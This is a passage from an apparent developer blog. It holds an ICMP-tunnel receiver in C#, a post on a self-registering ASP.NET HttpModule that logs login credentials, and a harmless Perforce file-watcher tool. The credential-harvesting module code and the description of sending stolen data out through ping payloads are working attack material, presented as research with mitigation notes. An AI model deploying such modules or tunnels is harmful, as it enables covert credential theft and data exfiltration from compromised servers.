            ConfigureAdapters(_engineHandle, adapters);

        void ConfigureParser()
            NetmonAPI.NmLoadNplParser(null, NmNplParserLoadingOption.NmAppendRegisteredNplSets, null, IntPtr.Zero, out _nplParserHandle);
            NetmonAPI.NmCreateFrameParserConfiguration(_nplParserHandle, null, IntPtr.Zero, out _configParserHandle);

            NetmonAPI.NmAddFilter(_configParserHandle, "Protocol.ICMP", out _icmpFilterId);
            NetmonAPI.NmAddField(_configParserHandle, "ICMP.Type", out _icmpTypeFieldId);
            NetmonAPI.NmAddField(_configParserHandle, "IPv4.SourceAddress", out _sourceIpFieldId);
            NetmonAPI.NmAddField(_configParserHandle, "ICMP.EchoReplyRequest.ImplementationSpecificData", out _icmpPayloadFieldId);

            NetmonAPI.NmCreateFrameParser(_configParserHandle, out _frameParserHandle, NmFrameParserOptimizeOption.ParserOptimizeFull);

        void ConfigureAdapters(IntPtr engineHandle, IEnumerable<NetworkInterface> adapters)
            var adapterInfo = new NM_NIC_ADAPTER_INFO { Size = (ushort)Marshal.SizeOf(typeof(NM_NIC_ADAPTER_INFO)) };

            uint adapterCount;
            NetmonAPI.NmGetAdapterCount(engineHandle, out adapterCount);

            for (uint i = 0; i < adapterCount; i++)
                NetmonAPI.NmGetAdapter(engineHandle, i, ref adapterInfo);
                if (adapters.Any(p => p.Id == string.Concat(adapterInfo.Guid.Take(38))))
                    NetmonAPI.NmConfigAdapter(engineHandle, i, _captureHandler, IntPtr.Zero,

                    if (NetmonAPI.NmStartCapture(engineHandle, i, _captureMode) == 0)

        void CaptureCallback(IntPtr captureEngine, UInt32 ladapterIndex, IntPtr callerContext, IntPtr rawFrame)
            IntPtr parsedFrame, insertedRawFrame; // insertedRawFrame is used by reassembly, which only works on saved data. Will always be -1 here.
            if (NetmonAPI.NmParseFrame(_frameParserHandle, rawFrame, uint.MinValue, 
                NmFrameParsingOption.None, out parsedFrame, out insertedRawFrame) == 0)
                bool passed;
                NetmonAPI.NmEvaluateFilter(parsedFrame, _icmpFilterId, out passed);
                if (passed)

                parsedFrame = IntPtr.Zero;
            rawFrame = IntPtr.Zero;

        void ParseIcmpPacket(IntPtr parsedFrame)
            ushort icmpType;
            NetmonAPI.NmGetFieldValueNumber16Bit(parsedFrame, _icmpTypeFieldId, out icmpType);

            if (icmpType == 8) // Echo Request
                var bytes = new byte[_icmpPayloadBufferSize];
                fixed (byte* buffer = &bytes[0])
                    uint size;
                    NetmonAPI.NmGetFieldValueByteArray(parsedFrame, _icmpPayloadFieldId, (uint)_icmpPayloadBufferSize, buffer, out size);
                    uint sourceIp;
                    NetmonAPI.NmGetFieldValueNumber32Bit(parsedFrame, _sourceIpFieldId, out sourceIp);

                        new IPAddress(sourceIp),
                        Encoding.ASCII.GetString(bytes, 0, (int)size));


        public void Dispose()

        private void Dispose(bool isDispose)
            if (!_isDisposed)
                _isDisposed = true;

                _adapterIndex.ForEach(i => NetmonAPI.NmStopCapture(_engineHandle, i));

                _engineHandle = _frameParserHandle = _nplParserHandle = _configParserHandle = IntPtr.Zero;

                if (isDispose)

Running from the console without Run as Administrator:

Sending and Reading custom ICMP payload

Obviously, running the two portions of the code on the same computer does not explain clearly what goes on behind the scenes. But note that there is nothing handling the reply from the Ping code (the Sender part). The Sender thread, is pinging Google but doesn't know about the reply at all. The Receiver code, running on a different thread, using Microsoft Network Monitor 3.4 API is intercepting all ICMP type 8 packets and parsing its data field.

Now adding the Sender portion to an HttpModule as I mentioned in previous post, an attacker could send sensitive data to another peer via simple ICMP echo requests. The data could be scrambled with a simple XOR or even ciphered with symmetric-key algorithm using hardcoded password or asymmetrically with a public key. Breaking large data into small chunks, would avoid fragmentation (remember MTU for Ethernet is 1500 bytes) and strangely big ICMP packets. Reordering the data on the Receiver gives great possibilities for data transfer. Even an ICMP Chat for Windows could be done, as mentioned in the introduction, exists one for unix-like systems.


On Wikipedia mitigation section, I found:

"Although the only way to prevent this type of tunneling is to block ICMP traffic altogether, this is not realistic for a production or real-world environment. One method for mitigation of this type of attack is to only allow fixed sized ICMP packets through firewalls to virtually eliminate this type of behavior."

I disagree that allowing only fixed size ICMP packets would avoid ICMP Tunnel since the data can be break into smaller chunks, fixed ones, and reassembled by the Receiver. Using the code I created as PoC, we can easily change the size of the data, even writing fixed size data, by adding one layer to control sequence numbering, offset, etc. Also we can change the ICMP type by using instead of echo Request, Destination Unreachable, or any other. However, considering the idea here is the theft of information, sent from within the network (behind NAT for example), to an external system that will probably receive and log data not only from one, but from several compromised systems, echo Request fits perfectly.

It's true that there are applications and other protocols relying on ICMP to work properly. The impact of blocking ICMP completely should be assessed prior to taking such action. Still, it should be blocked when not needed, and firewall rules to allow it on each particular case it is required.

Wednesday, February 22, 2012

HttpModules. Now even easier to be misused.

Attacks like DDoS or simple web defaces are just vandalism and for sure quite annoying. However, what is considered to be a serious threat is when skilled attackers target one application (or one company), looking for specific information. They dig until they find a security hole, escalate privileges and once they have access to one server, they begin to obtain access to other computer systems within that network.

What does it have to do with HttpModules?

HttpModules gives you a complete control over the Request, Response, Session, Cache and other modules loaded within your web application. They are required and very useful when building ASP.NET applications.

This great control over the application can also be misused when malicious attackers break into the Web Application Server. All the applications hosted there are compromised. Access to its ConnectionStrings means database access, and in case authentication is based on forms, all password hashes are readable. Bruteforcing against a dictionary or even using a hash database, like this one with over 10 million hashes, would break many of them. But with the control HttpModules gives to you is so big that you actually should not worry about hash cracking at all.

HttpModule Overview:

The classic way to build an HttpModule is to create a class within your Web Application project (or at least reference System.Web), implement IHttpModule interface, create an entry to the web.config, and it works. The registration of the HttpModule is the portion added to the web.config, like:
    <add name="AuditModule" type="BrunoGarcia.AuditModule"/>
HttpModules can easily be plugged in an application in production without rebuilding it or having any access to the source control what so ever. Simply adding the module dll under the bin folder or just putting HttpModule source file in App_Code folder which would trigger dynamic compilation and recycle the application. But the web.config registration would have to be done either way.

With the introduction of ASP.NET MVC 3, came along the Microsoft.Web.Infrastructure assembly. Microsoft has its description on msdn:

The Microsoft.Web.Infrastructure.DynamicModuleHelper contains classes that assist in managing dynamic modules in ASP.NET web pages that use the Razor syntax.

One of the classes within that namespace is: PreApplicationStartMethodAttribute that can be used to make the module registration programmatically. Note that even though it mentions "Razor syntax", what I describe here works with any type of ASP.NET application.

With this, it got even easier, considering the module will register itself. Just make sure the application server has the Microsoft.Web.Infrastructure.dll available either in the global assembly catalog (GAC) or at least under the application Bin folder and the application pool running on .Net 4.0. Matt Wrock wrote here, not long ago, about this new functionality and he ends the post with the section "Is this a good practice?" describing a few concerns about this technique. I'd like to quote this part:

"Well maybe I'm over thinking this but my first concern here is discoverability. In the case of this specific sample, the HttpModule is visibly changing the markup rendered to the browser. I envision a new developer or team inheriting this application and wonder just how long it will take for them to find where this "alteration" is coming from. ... Or perhaps a team member drops in such a module and forgets to tell the team she put it there. I'm thinking that at some point in this story some negative energy will be exerted. Perhaps even a tear shed?"

Now an attacker with write permission to the application bin folder can inject a module without even changing the web.config, and therefore make it even more complicated to detect the system was compromised.


To simulate the production system I've created a new project using ASP.NET Web Application template that creates a standard Web Forms Project, did no changes to the project, built it and hosted with IIS 7.5.
Created an entry to the loopback on C:\Windows\System32\drivers\etc\hosts called:
Note that IIS has default settings and the Application Pool is running under ApplicationPoolIdentity and as mentioned here, is:

ApplicationPoolIdentity is a Managed Service Account, which is a new concept introduced in Windows Server 2008 R2 and Windows 7.  For more information on Managed Service Accounts, please see the following link:

For this PoC I thought of simply intercepting all requests, and in case of a POST on the login form, write the username and password to a file. Writing a file on disk with the permission set that Application Pool has by default doesn't give you many options. However the ACL on ASP.NET Temp folder allows write access. 
Therefore I picked the path:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files

Then comes the module:
using System;
using System.IO;
using System.Web;
using System.Web.Hosting;
using Microsoft.Web.Infrastructure.DynamicModuleHelper;

[assembly: PreApplicationStartMethod(typeof(RequestInterceptorModule), "Run")]
public class RequestInterceptorModule : IHttpModule
    public static void Run()

    public void Dispose() { }

    const string myFile = @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\HttpModulePoC";
    static readonly object @lock = new object();

    public void Init(HttpApplication context)
        context.BeginRequest += new EventHandler(context_BeginRequest);

            string.Format("{0} Module initialized for application {1}\r\n",

    void context_BeginRequest(object sender, EventArgs e)
        var app = sender as HttpApplication;
        if (app.Request.RequestType == "POST"
            && Path.GetFileName(app.Request.PhysicalPath) == "Login.aspx")
            lock (@lock)
                File.AppendAllText(myFile, string.Format("{0} - Login: {1} - Password: {2}\r\n",

I built this class in its own project. A dll file with 6KB was created and I just copied it to the hosted application HttpModulePoC bin folder.

Then I browse:

When I hit the server, the application pool process starts, the module loads itself, subscribes for BeginRequest event and writes to the file:
21/02/2012 16:32:45 Module initialized for application HttpModulePoC

Click on Login link, write username and password and click Log In:

In the file I see:
21/02/2012 16:32:58 - Login: myUsername - Password: myPassword

This is just an example of what could be done. Think of having complete access to Cache, User Session, Request, Response and more. So much can be done.

Monitoring loaded modules:

As I mentioned above, before the introduction of:
Creating custom modules required registration on web.config. Simple monitoring the configuration files was enough. But now a different approach has to be used.
Before injecting my module to the HttpModulePoC application, enumerating the loaded Modules with:


I got the following15 items:


Mitigation could be done by writing a custom code to compare the allowed modules with the ones loaded. In case an unauthorized module is loaded, send an alert (or avoid completely the application from starting). Alerts could be simply written to event log or sent by e-mail.

Obviously, the most important is to train the development team to write secure code, make sure the system is up-to-date with security updates from the vendor of the operating system and applications installed. That will minimize the risk of attackers breaking into the application server.

Friday, February 10, 2012

New files on Visual Studio project added to Perforce

I worked with a few different source control systems. The first was Visual Source Safe, then CVS, Subversion (SVN) and for two years I was working with Team Foundation Server, and its Source Control. Great integration TFS has, just like any other Microsoft product working with each other.

Now I started working on a project with a different source control: Perforce
Wouldn't dare to talk badly about it, scalability is quite impressive and it has good features too.
There is also plugin to integrate your project to Visual Studio, which for example, adds to your pending list on Perforce, files you add to your Visual Studio project.

But what if your project is not integrated (or you don't have the plugin)?

Well, it was my case, and it means that every time you add files to your project on Visual Studio, using the Wizard for example, you have to open p4 client, browse to the file and click: Mark for Add. Only then, the files are shown in your changelist.

Not a problem. Every time I add something to the project, I have to remember to go to p4 and Mark for Add.
Obviously it didn't take long, I forgot to Mark for Add one file, submitted my changes and CruiseControl tray application went red. I broke the build!

Foreseen that would not be the only occasion, I decided to spend an hour or so doing some quick and dirty solution to serve as a patch for this lack of memory I might eventually have.

So the first thing that popped in my head was parsing the csproj file (would have to parse .sln too, in case I add a new project). That probably would take sometime to make work well.
And to know when it is changed, I would have to monitor it anyway. So I decided that monitoring the  project folder with FileSystemWatcher was the best effort/benefit ratio.

Considering my layout skills are great, I decided not to try to make a UI! :)
Well, there's a Context Menu, since defining the paths to monitors and Regular Expressions to ignore are required to make it work.

Path that match one if this Regex are ignored

But let's ignore that part and see it working:
I select Add file within Visual Studio, the file is written to the disk and immediately I get the popup, on top of Visual Studio:

Notification that file was added. Hit enter to add it to your Change list within Perforce
Despite the UI related code, which stayed in the Form1 code-behind, there's only 1 class, as I mentioned before Quick-and-dirty, that does the business. For each path you specify to be monitored, a new instance is created:

namespace AddToPerforce
    internal class Watcher : IDisposable
        private IEnumerable<string> _exceptions { get; set; }
        private FileSystemWatcher _fileWatchers = null;

        public string PathToMonitor { get; private set; }

        public Watcher(IEnumerable<string> exceptions, string pathToMonitor)
            _exceptions = exceptions;
            PathToMonitor = pathToMonitor;

        public void Start()
            _fileWatchers = new FileSystemWatcher(PathToMonitor);
            _fileWatchers.Created += CreatedHandler;
            _fileWatchers.Error += (s, e) => MessageBox.Show(string.Format("Error has occured: {0}", e.GetException().Message));
            _fileWatchers.EnableRaisingEvents = _fileWatchers.IncludeSubdirectories = true;

        public bool PauseContinue()
            return _fileWatchers.EnableRaisingEvents = !_fileWatchers.EnableRaisingEvents;

        void CreatedHandler(object sender, FileSystemEventArgs e)
            if (_exceptions.Any(p => Regex.IsMatch(e.FullPath, p))) return;

            var msg = string.Format(@"File created: 


Do you want to add it to your perforce Changelist?", e.FullPath);

            if (DialogResult.Yes == MessageBox.Show(msg, "File added!",
                Process.Start("p4", string.Format("add -f -c default \"{0}\"", e.FullPath));

        public void Dispose()
            if (_fileWatchers != null)

So now every time I add a file to the project (or write any file on the path I setup to be monitored), I get that Notification where I can choose to add it to Perforce changelist.

You can download the sources here.